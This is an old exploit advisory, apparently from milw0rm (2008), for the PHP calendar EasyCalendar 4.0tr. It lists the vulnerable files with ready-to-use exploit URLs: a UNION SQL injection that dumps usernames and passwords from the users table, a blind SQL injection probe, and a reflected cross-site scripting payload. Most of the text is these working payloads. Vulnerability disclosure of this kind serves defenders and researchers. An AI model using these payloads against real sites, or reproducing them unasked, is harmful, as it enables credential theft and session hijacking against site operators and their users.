--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ EasyCalendar <= 4.0tr - Multiple Remote Vulnerabilities +==-- --==+====================================================================================+==-- [+] [JosS] + [Spanish Hackers Team] + [Sys - Project] [+] Info: [~] Software: EsayCalendar [~] HomePage: http://myiosoft.com [~] Exploit: Multiple Remote Vulnerabilities [High] [~] Bug Found By: JosS [~] Contact: sys-project[at]hotmail.com [~] Web: http://www.spanish-hackers.com [~] Verified in localhost with EsayCalendar 4.0tr and magic_quotes Off [+] Remote SQL Injection: [~] Vuln File: calendar_backend.php [~] Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1[SQL] [~] Example: -1+union+all+select+1,2,3,concat(username,char(54),password),5,6,7,8,9,0,1+from+dbpfixajaxp_users/* [+] Blind SQL Injection: [~] Vuln File: ajaxp_backend.php [~] Exploit: http://localhost/PATH/ajaxp_backend.php?page=[BLIND] [~] Example: 1+and+1%3D0 [+] Cross Site Scripting: [~] Vuln File: calendar_backend.php [~] Exploit: http://localhost/PATH/plugins/calendar/calendar_backend.php?pageec=dayview&day=[XSS] [~] Example: >'>alert("JosS")%3B --==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==-- --==+ JosS +==-- --==+====================================================================================+==-- [+] [The End] # milw0rm.com [2008-03-12]